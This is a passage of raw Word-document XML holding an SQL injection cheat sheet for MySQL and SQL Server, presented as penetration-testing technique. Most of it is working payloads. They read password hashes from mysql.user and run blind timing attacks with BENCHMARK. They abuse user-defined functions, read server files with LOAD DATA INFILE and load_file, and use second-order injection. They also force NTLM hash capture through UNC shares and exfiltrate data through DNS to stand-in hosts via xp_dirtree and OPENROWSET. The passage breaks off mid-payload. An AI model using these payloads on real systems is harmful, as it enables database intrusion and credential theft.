    <w:p w14:paraId="1D63F23F" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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User,Password FROM mysql.user;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E511269" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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1,1 UNION SELECT IF(SUBSTRING(Password,1,1)='2',BENCHMARK(100000,SHA1(1)),0) User,Password FROM mysql.user WHERE User = 'root';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273C107A" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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 INTO DUMPFILE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (Writes the query result into a new file—cannot modify existing files)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4650D2FD" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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USER();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BB165E" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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password,USER() FROM mysql.user;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1555E18D" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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Abusing user-defined functions (UDF):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABAAA0D" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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create function LockWorkStation returns integer soname 'user32';</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>select LockWorkStation();</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>create function ExitProcess returns integer soname 'kernel32';</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>select exitprocess();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061A87AC" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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Getting the first byte of the admin password hash:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D387E2" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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lastRenderedPageBreak/>
        <w:t>SELECT SUBSTRING(user_password,1,1) FROM mb_users WHERE user_group = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4810BDFF" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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Reading a file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4555B1C2" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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query.php?user=1+union+select+load_file(0x63...),1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03913C51" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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Populating a table from a file using </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LOAD DATA INFILE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (not available in a default config, you first need to enable the setting </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>local_infile</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C3A4EC" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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CREATE TABLE foo( line blob ); </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>LOAD DATA INFILE 'c:/boot.ini' INTO TABLE foo; </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>SELECT * FROM foo;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9AE618" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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More timing-based tricks for MySQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7A2A5E" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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benchmark( 500000, sha1( 'test' ) );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB83788" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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query.php?user=1+union+select+benchmark(500000,sha1 (0x414141)),1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15373F04" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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select if( user() like 'root@%', benchmark(100000,sha1('test')), 'false' ); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0379316E" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47"/>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Brute-force enumeration:</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select if( (ascii(substring(user(),1,1)) &gt;&gt; 7) &amp; 1, benchmark(100000,sha1('test')), 'false' );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6A0C8B"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Useful MySQL functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E702A8F" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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MD5()</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001D5F4F" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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SHA1()</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DE0563" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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PASSWORD()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D815679" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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ENCODE()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DF27F4" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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COMPRESS()</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: Useful for compressing data, especially when reading large binaries via blind SQL injections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0C848B" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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ROW_COUNT()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6445BE95" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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SCHEMA()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AD3E28" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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VERSION()</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: Same as </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>@@version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B36712E"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r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Second-order SQL injections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A0B3B9"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With a second-order SQL injection, your injected payload is stored somewhere by the application and then used somewhere, hopefully unfiltered because SQL injection wasn’t expected in that place. This is a common hidden layer problem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1B9B05"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Say you have an application that lets you create some kind of user account. You can try this injection into the name field:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2016EE5A"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lastRenderedPageBreak/>
        <w:t>Name: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>' + (SELECT TOP 1 password FROM users ) + ' </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>Email:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> xx@xx.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC2BCE0"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With this payload, if the application uses the name field value in an unsafe stored procedure, function, or process, it will store the first user’s password as your name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD4B079"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r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Forcing SQL Server to get NTLM hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7982D64A"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This attack can help you get the SQL Server user’s Windows password for the target server when your inbound connection is firewalled. This can be very useful during internal penetration tests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B63C7E6"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The trick is to force SQL Server to connect to your Windows UNC share and then capture NTLM session data with a tool like Cain &amp; Abel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF89580"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Bulk insert from a UNC Share (S) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348C2C43"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You can bulk insert data not only from a file but also from a UNC share, which is useful here:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008ADB3D" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="0" w:color="CCCCCC"/>
          <w:left w:val="single" w:sz="6" w:space="0" w:color="CCCCCC"/>
          <w:bottom w:val="single" w:sz="6" w:space="0" w:color="CCCCCC"/>
          <w:right w:val="single" w:sz="6" w:space="0"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rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BULK INSERT foo FROM '\\</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>your-ip-address</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\C$\x.txt'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A095EEB"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r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Out-of-band channel attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048B3A36"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An </w:t>
      </w:r>
      <w:hyperlink r:id="rId89" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>out-of-band (OOB) SQL injection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> is done when you need to exfiltrate data through a different channel than you used for the injection. DNS is one of the most common out-of-band channels because DNS requests are rarely blocked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C44EA94"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Out-of-band injections for SQL Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE81C1D"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t>Both examples will send a DNS resolution request to </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>YOUR-INJECTION-HERE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.example.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258B5130" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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?vulnerableParam=1; SELECT * FROM OPENROWSET('SQLOLEDB', (</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>YOUR-INJECTION-HERE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)+'.example.com';'sa';'pwd', 'SELECT 1')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB6714E" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>?vulnerableParam=1; DECLARE @q varchar(1024); SET @q = '\\'+(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>YOUR-INJECTION-HERE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)+'.example.com\\test.txt'; EXEC master..xp_dirtree @q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E25B97E"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Out-of-band injections for MySQL (Windows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7849EFDC" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The next two payloads attempt to reach UNC shares, so they can only work on Windows operating systems (Linux does not natively support or resolve these). Additionally, this only works if the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>secure_file_priv</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> setting is set to an empty string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4783CA00" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>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Sends a NBNS query request/DNS resolution request to </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>YOUR-INJECTION-HERE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.yourhost.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</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?vulnerableParam=-99 OR (SELECT LOAD_FILE(concat('\\\\',(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
